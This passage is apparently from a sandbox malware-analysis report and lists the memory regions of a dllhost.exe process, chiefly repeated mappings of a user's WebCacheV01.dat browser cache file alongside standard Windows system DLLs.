private name = "private_0x0000000003900000" filename = "" Region: id = 885 start_va = 0x3990000 end_va = 0x399ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 886 start_va = 0x39a0000 end_va = 0x39affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 887 start_va = 0x39b0000 end_va = 0x39bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 888 start_va = 0x39c0000 end_va = 0x39cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 889 start_va = 0x39d0000 end_va = 0x39dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 890 start_va = 0x39e0000 end_va = 0x39effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 891 start_va = 0x39f0000 end_va = 0x39fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 892 start_va = 0x3a00000 end_va = 0x3a07fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a00000" filename = "" Region: id = 893 start_va = 0x3a10000 end_va = 0x3a1ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 894 start_va = 0x3a20000 end_va = 0x3a2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 895 start_va = 0x3a30000 end_va = 0x3a3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 896 start_va = 0x3a40000 end_va = 0x3a4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 897 start_va = 0x3a50000 end_va = 0x3a57fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a50000" filename = "" Region: id = 898 start_va = 0x3a60000 end_va = 0x3a6ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 899 start_va = 0x3a70000 end_va = 0x3a7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 900 start_va = 0x3a80000 end_va = 0x3a8ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003a80000" filename = "" Region: id = 901 start_va = 0x3a90000 end_va = 0x3a9ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 902 start_va = 0x3aa0000 end_va = 0x3aaffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 903 start_va = 0x3ab0000 end_va = 0x3abffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 904 start_va = 0x3ac0000 end_va = 0x3acffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 905 start_va = 0x3ad0000 end_va = 0x3adffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 906 start_va = 0x3ae0000 end_va = 0x3aeffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 907 start_va = 0x3af0000 end_va = 0x3afffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 908 start_va = 0x3b00000 end_va = 0x3b0ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 909 start_va = 0x3b10000 end_va = 0x3b1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003b10000" filename = "" Region: id = 910 start_va = 0x3b20000 end_va = 0x3b2ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 911 start_va = 0x3b30000 end_va = 0x3b3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 912 start_va = 0x3b40000 end_va = 0x3b4ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 913 start_va = 0x3b50000 end_va = 0x3c4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003b50000" filename = "" Region: id = 914 start_va = 0x3c50000 end_va = 0x3c5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 915 start_va = 0x3c60000 end_va = 0x3c6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003c60000" filename = "" Region: id = 916 start_va = 0x3c70000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 917 start_va = 0x3c80000 end_va = 0x3c8ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 918 start_va = 0x3ca0000 end_va = 0x3caffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 919 start_va = 0x3cb0000 end_va = 0x3daffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003cb0000" filename = "" Region: id = 920 start_va = 0x3db0000 end_va = 0x3eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003db0000" filename = "" Region: id = 921 start_va = 0x3fb0000 end_va = 0x40affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 922 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 923 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 924 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 925 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 926 start_va = 0x7ff7f8d90000 end_va = 0x7ff7f8d96fff monitored = 0 entry_point = 0x7ff7f8d91570 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 927 start_va = 0x7ffb14670000 end_va = 0x7ffb14684fff monitored = 0 entry_point = 0x7ffb14675740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 928 start_va = 0x7ffb18310000 end_va = 0x7ffb18608fff monitored = 0 entry_point = 0x7ffb183d7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 929 start_va = 0x7ffb19d70000 end_va = 0x7ffb19ffdfff monitored = 0 entry_point = 0x7ffb19e40f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 930 start_va = 0x7ffb1f310000 end_va = 0x7ffb1f691fff monitored = 0 entry_point = 0x7ffb1f361220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 931 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 932 start_va = 0x7ffb24610000 end_va = 0x7ffb24640fff monitored = 0 entry_point = 0x7ffb24617d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 933 start_va = 0x7ffb24880000 end_va = 0x7ffb2489efff monitored = 0 entry_point = 0x7ffb24885d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 934 start_va = 0x7ffb24bc0000 end_va = 0x7ffb24bcafff monitored = 0 entry_point = 0x7ffb24bc19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 935 start_va = 0x7ffb24fb0000 end_va = 0x7ffb24fd8fff monitored = 0 entry_point = 0x7ffb24fc4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 936 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 937 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 938 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 939 start_va = 0x7ffb251b0000 end_va = 0x7ffb25397fff monitored = 0 entry_point = 0x7ffb251dba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 940 start_va = 0x7ffb25640000 end_va = 0x7ffb256a9fff monitored = 0 entry_point = 0x7ffb25676d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 941 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 942 start_va = 0x7ffb25800000 end_va = 0x7ffb25842fff monitored = 0 entry_point = 0x7ffb25814b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 943 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 944 start_va = 0x7ffb25f00000 end_va = 0x7ffb26085fff monitored = 0 entry_point = 0x7ffb25f4ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 945 start_va = 0x7ffb26090000 end_va = 0x7ffb261e5fff monitored = 0 entry_point = 0x7ffb2609a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 946 start_va = 0x7ffb261f0000 end_va = 0x7ffb2622afff monitored = 0 entry_point = 0x7ffb261f12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 947 start_va = 0x7ffb26230000 end_va = 0x7ffb262dcfff monitored = 0 entry_point = 0x7ffb262481a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 948 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 949 start_va = 0x7ffb264f0000 end_va = 0x7ffb2658cfff monitored = 0 entry_point = 0x7ffb264f78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 950 start_va = 0x7ffb26590000 end_va = 0x7ffb266abfff monitored = 0 entry_point = 0x7ffb265d02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 951 start_va = 0x7ffb266b0000 end_va = 0x7ffb26756fff monitored = 0 entry_point = 0x7ffb266bb4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 952 start_va = 0x7ffb267e0000 end_va = 0x7ffb27d3efff monitored = 0 entry_point = 0x7ffb269411f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 953 start_va = 0x7ffb27d40000 end_va = 0x7ffb27d9afff monitored = 0 entry_point = 0x7ffb27d538b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 954 start_va = 0x7ffb27e00000 end_va = 0x7ffb2807cfff monitored = 0 entry_point = 0x7ffb27ed4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 955 start_va = 0x7ffb288f0000 end_va = 0x7ffb289b0fff monitored = 0 entry_point = 0x7ffb28910da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 956 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 957 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1680 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1681 start_va = 0x840000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1682 start_va = 0x820000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1684 start_va = 0x840000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 1686 start_va = 0x850000 end_va = 0x850fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 2707 start_va = 0x850000 end_va = 0x857fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 2708 start_va = 0x860000 end_va = 0x867fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 2709 start_va = 0x890000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000890000" filename = "" Region: id = 2710 start_va = 0x8a0000 end_va = 0x8a7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 2711 start_va = 0x2350000 end_va = 0x2357fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 2712 start_va = 0x2360000 end_va = 0x236ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2713 start_va = 0x890000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2720 start_va = 0x8a0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2721 start_va = 0x850000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 2770 start_va = 0x2350000 end_va = 0x2350fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 3416 start_va = 0x2350000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3417 start_va = 0x24c0000 end_va = 0x24c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 3418 start_va = 0x24d0000 end_va = 0x24dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3419 start_va = 0x24e0000 end_va = 0x24e7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024e0000" filename = "" Region: id = 3420 start_va = 0x24f0000 end_va = 0x24f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024f0000" filename = "" Region: id = 3421 start_va = 0x2500000 end_va = 0x2507fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002500000" filename = "" Region: id = 3422 start_va = 0x2510000 end_va = 0x2517fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 3425 start_va = 0x2520000 end_va = 0x252ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3426 start_va = 0x24e0000 end_va = 0x24effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3427 start_va = 0x2510000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3428 start_va = 0x24f0000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3429 start_va = 0x2500000 end_va = 0x250ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3430 start_va = 0x24c0000 end_va = 0x24c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 3431 start_va = 0x2350000 end_va = 0x2350fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 3432 start_va = 0x24c0000 end_va = 0x24c7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000024c0000" filename = "" Region: id = 3577 start_va = 0x2350000 end_va = 0x2357fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 3578 start_va = 0x24c0000 end_va = 0x24cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 3579 start_va = 0x2350000 end_va = 0x235ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: 